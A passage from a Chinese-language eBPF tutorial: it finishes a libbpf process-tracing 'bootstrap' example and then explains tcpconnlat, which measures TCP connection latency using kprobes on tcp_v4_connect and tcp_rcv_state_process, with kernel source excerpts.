||
|
||
int main(int argc, char **argv)
|
||
{
|
||
struct ring_buffer *rb = NULL;
|
||
struct bootstrap_bpf *skel;
|
||
int err;
|
||
|
||
/* Parse command line arguments */
|
||
err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
|
||
if (err)
|
||
return err;
|
||
|
||
/* Set up libbpf errors and debug info callback */
|
||
libbpf_set_print(libbpf_print_fn);
|
||
|
||
/* Cleaner handling of Ctrl-C */
|
||
signal(SIGINT, sig_handler);
|
||
signal(SIGTERM, sig_handler);
|
||
|
||
/* Load and verify BPF application */
|
||
skel = bootstrap_bpf__open();
|
||
if (!skel) {
|
||
fprintf(stderr, "Failed to open and load BPF skeleton\n");
|
||
return 1;
|
||
}
|
||
|
||
/* Parameterize BPF code with minimum duration parameter */
|
||
skel->rodata->min_duration_ns = env.min_duration_ms * 1000000ULL;
|
||
|
||
/* Load & verify BPF programs */
|
||
err = bootstrap_bpf__load(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
/* Attach tracepoints */
|
||
err = bootstrap_bpf__attach(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to attach BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
/* Set up ring buffer polling */
|
||
rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
|
||
if (!rb) {
|
||
err = -1;
|
||
fprintf(stderr, "Failed to create ring buffer\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
/* Process events */
|
||
printf("%-8s %-5s %-16s %-7s %-7s %s\n",
|
||
"TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE");
|
||
while (!exiting) {
|
||
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
|
||
/* Ctrl-C will cause -EINTR */
|
||
if (err == -EINTR) {
|
||
err = 0;
|
||
break;
|
||
}
|
||
if (err < 0) {
|
||
printf("Error polling perf buffer: %d\n", err);
|
||
break;
|
||
}
|
||
}
|
||
|
||
cleanup:
|
||
/* Clean up */
|
||
ring_buffer__free(rb);
|
||
bootstrap_bpf__destroy(skel);
|
||
|
||
return err < 0 ? -err : 0;
|
||
}
|
||
</code></pre>
|
||
<p>这个用户态程序主要用于加载、验证、附加 eBPF 程序,以及接收 eBPF 程序收集的事件数据,并将其打印出来。我们将分析一些关键部分。</p>
|
||
<p>首先,我们定义了一个 env 结构,用于存储命令行参数:</p>
|
||
<pre><code class="language-c">static struct env {
|
||
bool verbose;
|
||
long min_duration_ms;
|
||
} env;
|
||
</code></pre>
|
||
<p>接下来,我们使用 argp 库来解析命令行参数:</p>
|
||
<pre><code class="language-c">static const struct argp_option opts[] = {
|
||
{ "verbose", 'v', NULL, 0, "Verbose debug output" },
|
||
{ "duration", 'd', "DURATION-MS", 0, "Minimum process duration (ms) to report" },
|
||
{},
|
||
};
|
||
|
||
static error_t parse_arg(int key, char *arg, struct argp_state *state)
|
||
{
|
||
// ...
|
||
}
|
||
|
||
static const struct argp argp = {
|
||
.options = opts,
|
||
.parser = parse_arg,
|
||
.doc = argp_program_doc,
|
||
};
|
||
</code></pre>
|
||
<p>main() 函数中,首先解析命令行参数,然后设置 libbpf 的打印回调函数 libbpf_print_fn,以便在需要时输出调试信息:</p>
|
||
<pre><code class="language-c">err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
|
||
if (err)
|
||
return err;
|
||
|
||
libbpf_set_print(libbpf_print_fn);
|
||
</code></pre>
|
||
<p>接下来,我们打开 eBPF 脚手架(skeleton)文件,将最小持续时间参数传递给 eBPF 程序,并加载和附加 eBPF 程序:</p>
|
||
<pre><code class="language-c">skel = bootstrap_bpf__open();
|
||
if (!skel) {
|
||
fprintf(stderr, "Failed to open and load BPF skeleton\n");
|
||
return 1;
|
||
}
|
||
|
||
skel->rodata->min_duration_ns = env.min_duration_ms * 1000000ULL;
|
||
|
||
err = bootstrap_bpf__load(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
err = bootstrap_bpf__attach(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to attach BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>然后,我们创建一个环形缓冲区(ring buffer),用于接收 eBPF 程序发送的事件数据:</p>
|
||
<pre><code class="language-c">rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
|
||
if (!rb) {
|
||
err = -1;
|
||
fprintf(stderr, "Failed to create ring buffer\n");
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>handle_event() 函数会处理从 eBPF 程序收到的事件。根据事件类型(进程执行或退出),它会提取并打印事件信息,如时间戳、进程名、进程 ID、父进程 ID、文件名或退出代码等。</p>
|
||
<p>最后,我们使用 ring_buffer__poll() 函数轮询环形缓冲区,处理收到的事件数据:</p>
|
||
<pre><code class="language-c">while (!exiting) {
|
||
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
|
||
// ...
|
||
}
|
||
</code></pre>
|
||
<p>当程序收到 SIGINT 或 SIGTERM 信号时,轮询循环会结束,程序随后完成清理操作,释放环形缓冲区并销毁(卸载)eBPF 程序:</p>
|
||
<pre><code class="language-c">cleanup:
|
||
/* Clean up */
|
||
ring_buffer__free(rb);
|
||
bootstrap_bpf__destroy(skel);
|
||
|
||
return err < 0 ? -err : 0;
|
||
}
|
||
</code></pre>
|
||
<h2 id="安装依赖"><a class="header" href="#安装依赖">安装依赖</a></h2>
|
||
<p>构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。</p>
|
||
<p>在 Ubuntu/Debian 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo apt install clang libelf1 libelf-dev zlib1g-dev
|
||
</code></pre>
|
||
<p>在 CentOS/Fedora 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel
|
||
</code></pre>
|
||
<h2 id="编译运行-1"><a class="header" href="#编译运行-1">编译运行</a></h2>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ make
|
||
BPF .output/bootstrap.bpf.o
|
||
GEN-SKEL .output/bootstrap.skel.h
|
||
CC .output/bootstrap.o
|
||
BINARY bootstrap
|
||
$ sudo ./bootstrap
|
||
[sudo] password for yunwei:
|
||
TIME EVENT COMM PID PPID FILENAME/EXIT CODE
|
||
03:16:41 EXEC sh 110688 80168 /bin/sh
|
||
03:16:41 EXEC which 110689 110688 /usr/bin/which
|
||
03:16:41 EXIT which 110689 110688 [0] (0ms)
|
||
03:16:41 EXIT sh 110688 80168 [0] (0ms)
|
||
03:16:41 EXEC sh 110690 80168 /bin/sh
|
||
03:16:41 EXEC ps 110691 110690 /usr/bin/ps
|
||
03:16:41 EXIT ps 110691 110690 [0] (49ms)
|
||
03:16:41 EXIT sh 110690 80168 [0] (51ms)
|
||
</code></pre>
|
||
<h2 id="总结-10"><a class="header" href="#总结-10">总结</a></h2>
|
||
<p>通过这个实例,我们了解了如何将 eBPF 程序与用户态程序结合使用。这种结合为开发者提供了一个强大的工具集,可以实现跨内核和用户空间的高效数据收集和处理。通过使用 eBPF 和 libbpf,您可以构建更高效、可扩展和安全的监控和性能分析工具。</p>
|
||
<p>在接下来的教程中,我们将继续深入探讨 eBPF 的高级特性,分享更多关于 eBPF 开发实践的内容。通过不断学习和实践,您将更好地理解和掌握 eBPF 技术,并将其应用于解决实际问题。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf入门开发实践教程十三统计-tcp-连接延时并使用-libbpf-在用户态处理数据"><a class="header" href="#ebpf入门开发实践教程十三统计-tcp-连接延时并使用-libbpf-在用户态处理数据">eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。</p>
|
||
<h2 id="背景"><a class="header" href="#背景">背景</a></h2>
|
||
<p>在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。</p>
|
||
<p>分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。</p>
|
||
<h2 id="tcpconnlat-工具概述"><a class="header" href="#tcpconnlat-工具概述">tcpconnlat 工具概述</a></h2>
|
||
<p><code>tcpconnlat</code> 这个工具能够跟踪内核中执行主动 TCP 连接的函数(例如由 <code>connect()</code> 系统调用触发的函数),测量并显示连接延时,即从发送 SYN 到收到响应包的时间。</p>
|
||
<h3 id="tcp-连接原理"><a class="header" href="#tcp-连接原理">TCP 连接原理</a></h3>
|
||
<p>TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤:</p>
|
||
<ol>
|
||
<li>客户端向服务器发送 SYN 包:客户端通过 <code>connect()</code> 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。</li>
|
||
<li>SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。</li>
|
||
<li>服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。</li>
|
||
<li>SYN/ACK 包传送到客户端:这是另一次网络传输。</li>
|
||
<li>客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。</li>
|
||
<li>ACK 包传送到服务器:这是第三次网络传输。</li>
|
||
<li>服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。</li>
|
||
<li>唤醒服务器端用户进程:被 <code>accept()</code> 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。</li>
|
||
</ol>
|
||
<p>完整的流程图如下所示:</p>
|
||
<p><img src="13-tcpconnlat/tcpconnlat1.png" alt="tcpconnlat1" /></p>
|
||
<p>从客户端的视角来看,正常情况下一次 TCP 连接的总耗时大约就是一次网络 RTT 的耗时。但在某些情况下,连接时的网络传输耗时可能上涨,CPU 处理开销可能增加,甚至连接可能失败。此时,在发现延时过长之后,就可以结合其他信息进行分析。</p>
|
||
<h2 id="tcpconnlat-的-ebpf-实现"><a class="header" href="#tcpconnlat-的-ebpf-实现">tcpconnlat 的 eBPF 实现</a></h2>
|
||
<p>为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列:</p>
|
||
<ul>
|
||
<li>半连接队列(SYN 队列):存储那些正在进行三次握手操作的 TCP 连接,服务器收到 SYN 包后,会将该连接信息存储在此队列中。</li>
|
||
<li>全连接队列(Accept 队列):存储已经完成三次握手,等待应用程序调用 <code>accept()</code> 函数的 TCP 连接。服务器在收到 ACK 包后,会创建一个新的连接并将其添加到此队列。</li>
|
||
</ul>
|
||
<p>理解了这两个队列的用途,我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分,其中包括了几个主要的跟踪点:<code>tcp_v4_connect</code>, <code>tcp_v6_connect</code> 和 <code>tcp_rcv_state_process</code>。</p>
|
||
<p>这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。</p>
|
||
<p>让我们先来看一下这些挂载点的源代码:</p>
|
||
<pre><code class="language-c">SEC("kprobe/tcp_v4_connect")
|
||
int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_v6_connect")
|
||
int BPF_KPROBE(tcp_v6_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_rcv_state_process")
|
||
int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
|
||
{
|
||
return handle_tcp_rcv_state_process(ctx, sk);
|
||
}
|
||
</code></pre>
|
||
<p>这段代码展示了三个内核探针(kprobe)的定义。<code>tcp_v4_connect</code> 和 <code>tcp_v6_connect</code> 在对应的 IPv4 和 IPv6 连接被初始化时被触发,调用 <code>trace_connect()</code> 函数,而 <code>tcp_rcv_state_process</code> 在内核处理 TCP 连接状态变化时被触发,调用 <code>handle_tcp_rcv_state_process()</code> 函数。</p>
|
||
<p>接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。</p>
|
||
<h3 id="tcp_v4_connect-函数解析"><a class="header" href="#tcp_v4_connect-函数解析">tcp_v4_connect 函数解析</a></h3>
|
||
<p><code>tcp_v4_connect</code>函数是Linux内核处理TCP的IPv4连接请求的主要方式。当用户态程序通过<code>socket</code>系统调用创建了一个套接字后,接着通过<code>connect</code>系统调用尝试连接到远程服务器,此时就会触发<code>tcp_v4_connect</code>函数。</p>
|
||
<pre><code class="language-c">/* This will initiate an outgoing connection. */
|
||
int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
|
||
{
|
||
struct sockaddr_in *usin = (struct sockaddr_in *)uaddr;
|
||
struct inet_timewait_death_row *tcp_death_row;
|
||
struct inet_sock *inet = inet_sk(sk);
|
||
struct tcp_sock *tp = tcp_sk(sk);
|
||
struct ip_options_rcu *inet_opt;
|
||
struct net *net = sock_net(sk);
|
||
__be16 orig_sport, orig_dport;
|
||
__be32 daddr, nexthop;
|
||
struct flowi4 *fl4;
|
||
struct rtable *rt;
|
||
int err;
|
||
|
||
if (addr_len < sizeof(struct sockaddr_in))
|
||
return -EINVAL;
|
||
|
||
if (usin->sin_family != AF_INET)
|
||
return -EAFNOSUPPORT;
|
||
|
||
nexthop = daddr = usin->sin_addr.s_addr;
|
||
inet_opt = rcu_dereference_protected(inet->inet_opt,
|
||
lockdep_sock_is_held(sk));
|
||
if (inet_opt && inet_opt->opt.srr) {
|
||
if (!daddr)
|
||
return -EINVAL;
|
||
nexthop = inet_opt->opt.faddr;
|
||
}
|
||
|
||
orig_sport = inet->inet_sport;
|
||
orig_dport = usin->sin_port;
|
||
fl4 = &inet->cork.fl.u.ip4;
|
||
rt = ip_route_connect(fl4, nexthop, inet->inet_saddr,
|
||
sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport,
|
||
orig_dport, sk);
|
||
if (IS_ERR(rt)) {
|
||
err = PTR_ERR(rt);
|
||
if (err == -ENETUNREACH)
|
||
IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES);
|
||
return err;
|
||
}
|
||
|
||
if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) {
|
||
ip_rt_put(rt);
|
||
return -ENETUNREACH;
|
||
}
|
||
|
||
if (!inet_opt || !inet_opt->opt.srr)
|
||
daddr = fl4->daddr;
|
||
|
||
tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row;
|
||
|
||
if (!inet->inet_saddr) {
|
||
err = inet_bhash2_update_saddr(sk, &fl4->saddr, AF_INET);
|
||
if (err) {
|
||
ip_rt_put(rt);
|
||
return err;
|
||
}
|
||
} else {
|
||
sk_rcv_saddr_set(sk, inet->inet_saddr);
|
||
}
|
||
|
||
if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) {
|
||
/* Reset inherited state */
|
||
tp->rx_opt.ts_recent = 0;
|
||
tp->rx_opt.ts_recent_stamp = 0;
|
||
if (likely(!tp->repair))
|
||
WRITE_ONCE(tp->write_seq, 0);
|
||
}
|
||
|
||
inet->inet_dport = usin->sin_port;
|
||
sk_daddr_set(sk, daddr);
|
||
|
||
inet_csk(sk)->icsk_ext_hdr_len = 0;
|
||
if (inet_opt)
|
||
inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen;
|
||
|
||
tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT;
|
||
|
||
/* Socket identity is still unknown (sport may be zero).
|
||
* However we set state to SYN-SENT and not releasing socket
|
||
* lock select source port, enter ourselves into the hash tables and
|
||
* complete initialization after this.
|
||
*/
|
||
tcp_set_state(sk, TCP_SYN_SENT);
|
||
err = inet_hash_connect(tcp_death_row, sk);
|
||
if (err)
|
||
goto failure;
|
||
|
||
sk_set_txhash(sk);
|
||
|
||
rt = ip_route_newports(fl4, rt, orig_sport, orig_dport,
|
||
inet->inet_sport, inet->inet_dport, sk);
|
||
if (IS_ERR(rt)) {
|
||
err = PTR_ERR(rt);
|
||
rt = NULL;
|
||
goto failure;
|
||
}
|
||
/* OK, now commit destination to socket. */
|
||
sk->sk_gso_type = SKB_GSO_TCPV4;
|
||
sk_setup_caps(sk, &rt->dst);
|
||
rt = NULL;
|
||
|
||
if (likely(!tp->repair)) {
|
||
if (!tp->write_seq)
|
||
WRITE_ONCE(tp->write_seq,
|
||
secure_tcp_seq(inet->inet_saddr,
|
||
inet->inet_daddr,
|
||
inet->inet_sport,
|
||
usin->sin_port));
|
||
tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr,
|
||
inet->inet_daddr);
|
||
}
|
||
|
||
inet->inet_id = get_random_u16();
|
||
|
||
if (tcp_fastopen_defer_connect(sk, &err))
|
||
return err;
|
||
if (err)
|
||
goto failure;
|
||
|
||
err = tcp_connect(sk);
|
||
|
||
if (err)
|
||
goto failure;
|
||
|
||
return 0;
|
||
|
||
failure:
|
||
/*
|
||
* This unhashes the socket and releases the local port,
|
||
* if necessary.
|
||
*/
|
||
tcp_set_state(sk, TCP_CLOSE);
|
||
inet_bhash2_reset_saddr(sk);
|
||
ip_rt_put(rt);
|
||
sk->sk_route_caps = 0;
|
||
inet->inet_dport = 0;
|
||
return err;
|
||
}
|
||
EXPORT_SYMBOL(tcp_v4_connect);
|
||
</code></pre>
|
||
<p>参考链接:<a href="https://elixir.bootlin.com/linux/latest/source/net/ipv4/tcp_ipv4.c#L340">https://elixir.bootlin.com/linux/latest/source/net/ipv4/tcp_ipv4.c#L340</a></p>
|
||
<p>接下来,我们一步步分析这个函数:</p>
|
||
<p>首先,这个函数接收三个参数:一个套接字指针<code>sk</code>,一个指向套接字地址结构的指针<code>uaddr</code>和地址的长度<code>addr_len</code>。</p>
|
||
<pre><code class="language-c">int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
|
||
</code></pre>
|
||
<p>函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。</p>
|
||
<p>接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。</p>
|
||
<pre><code class="language-c">nexthop = daddr = usin->sin_addr.s_addr;
|
||
inet_opt = rcu_dereference_protected(inet->inet_opt,
|
||
lockdep_sock_is_held(sk));
|
||
if (inet_opt && inet_opt->opt.srr) {
|
||
if (!daddr)
|
||
return -EINVAL;
|
||
nexthop = inet_opt->opt.faddr;
|
||
}
|
||
</code></pre>
|
||
<p>然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。</p>
|
||
<p>接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为<code>SYN-SENT</code>。</p>
|
||
<p>然后,这个函数使用<code>inet_hash_connect</code>函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。</p>
|
||
<p>如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。</p>
|
||
<p>接下来,它提交目标信息到套接字,并在非 repair 模式下为初始序列号(<code>write_seq</code>,仅当其尚未设置时)和时间戳偏移(<code>tsoffset</code>)选择安全的值。</p>
|
||
<p>然后,函数通过 <code>tcp_fastopen_defer_connect</code> 检查是否可以借助 TCP Fast Open(TFO)延迟发起连接:如果可以,函数直接返回;如果这一步出错,则进入失败处理;否则调用 <code>tcp_connect</code> 发送 SYN,开始普通的 TCP 三次握手。</p>
|
||
<p>最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。</p>
|
||
<p>总的来说,<code>tcp_v4_connect</code>函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。</p>
|
||
<h3 id="内核态代码"><a class="header" href="#内核态代码">内核态代码</a></h3>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0
|
||
// Copyright (c) 2020 Wenbo Zhang
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "tcpconnlat.h"
|
||
|
||
#define AF_INET 2
|
||
#define AF_INET6 10
|
||
|
||
const volatile __u64 targ_min_us = 0;
|
||
const volatile pid_t targ_tgid = 0;
|
||
|
||
struct piddata {
|
||
char comm[TASK_COMM_LEN];
|
||
u64 ts;
|
||
u32 tgid;
|
||
};
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 4096);
|
||
__type(key, struct sock *);
|
||
__type(value, struct piddata);
|
||
} start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
|
||
static int trace_connect(struct sock *sk)
|
||
{
|
||
u32 tgid = bpf_get_current_pid_tgid() >> 32;
|
||
struct piddata piddata = {};
|
||
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
|
||
piddata.ts = bpf_ktime_get_ns();
|
||
piddata.tgid = tgid;
|
||
bpf_map_update_elem(&start, &sk, &piddata, 0);
|
||
return 0;
|
||
}
|
||
|
||
static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
|
||
{
|
||
struct piddata *piddatap;
|
||
struct event event = {};
|
||
s64 delta;
|
||
u64 ts;
|
||
|
||
if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
|
||
return 0;
|
||
|
||
piddatap = bpf_map_lookup_elem(&start, &sk);
|
||
if (!piddatap)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
delta = (s64)(ts - piddatap->ts);
|
||
if (delta < 0)
|
||
goto cleanup;
|
||
|
||
event.delta_us = delta / 1000U;
|
||
if (targ_min_us && event.delta_us < targ_min_us)
|
||
goto cleanup;
|
||
__builtin_memcpy(&event.comm, piddatap->comm,
|
||
sizeof(event.comm));
|
||
event.ts_us = ts / 1000;
|
||
event.tgid = piddatap->tgid;
|
||
event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
|
||
event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
|
||
event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
|
||
if (event.af == AF_INET) {
|
||
event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
|
||
event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
|
||
} else {
|
||
BPF_CORE_READ_INTO(&event.saddr_v6, sk,
|
||
__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
|
||
BPF_CORE_READ_INTO(&event.daddr_v6, sk,
|
||
__sk_common.skc_v6_daddr.in6_u.u6_addr32);
|
||
}
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
|
||
&event, sizeof(event));
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&start, &sk);
|
||
return 0;
|
||
}
|
||
|
||
SEC("kprobe/tcp_v4_connect")
|
||
int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_v6_connect")
|
||
int BPF_KPROBE(tcp_v6_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_rcv_state_process")
|
||
int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
|
||
{
|
||
return handle_tcp_rcv_state_process(ctx, sk);
|
||
}
|
||
|
||
SEC("fentry/tcp_v4_connect")
|
||
int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("fentry/tcp_v6_connect")
|
||
int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("fentry/tcp_rcv_state_process")
|
||
int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk)
|
||
{
|
||
return handle_tcp_rcv_state_process(ctx, sk);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(<code>connect</code>系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。</p>
|
||
<p>首先,定义了两个eBPF maps:<code>start</code>和<code>events</code>。<code>start</code>是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而<code>events</code>是一个<code>PERF_EVENT_ARRAY</code>类型的map,用于将事件数据传输到用户态。</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 4096);
|
||
__type(key, struct sock *);
|
||
__type(value, struct piddata);
|
||
} start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
</code></pre>
|
||
<p>在<code>tcp_v4_connect</code>和<code>tcp_v6_connect</code>的kprobe处理函数<code>trace_connect</code>中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到<code>start</code>这个map中。</p>
|
||
<pre><code class="language-c">static int trace_connect(struct sock *sk)
|
||
{
|
||
u32 tgid = bpf_get_current_pid_tgid() >> 32;
|
||
struct piddata piddata = {};
|
||
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
|
||
piddata.ts = bpf_ktime_get_ns();
|
||
piddata.tgid = tgid;
|
||
bpf_map_update_elem(&start, &sk, &piddata, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发<code>tcp_rcv_state_process</code>的kprobe处理函数<code>handle_tcp_rcv_state_process</code>。在这个函数中,首先检查socket的状态是否为<code>SYN-SENT</code>,如果是,会从<code>start</code>这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过<code>bpf_perf_event_output</code>函数发送到用户态。</p>
|
||
<pre><code class="language-c">static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
|
||
{
|
||
struct piddata *piddatap;
|
||
struct event event = {};
|
||
s64 delta;
|
||
u64 ts;
|
||
|
||
if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
|
||
return 0;
|
||
|
||
piddatap = bpf_map_lookup_elem(&start, &sk);
|
||
if (!piddatap)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
delta = (s64)(ts - piddatap->ts);
|
||
if (delta < 0)
|
||
goto cleanup;
|
||
|
||
event.delta_us = delta / 1000U;
|
||
if (targ_min_us && event.delta_us < targ_min_us)
|
||
goto cleanup;
|
||
__builtin_memcpy(&event.comm, piddatap->comm,
|
||
sizeof(event.comm));
|
||
event.ts_us = ts / 1000;
|
||
event.tgid = piddatap->tgid;
|
||
event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
|
||
event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
|
||
event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
|
||
if (event.af == AF_INET) {
|
||
event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
|
||
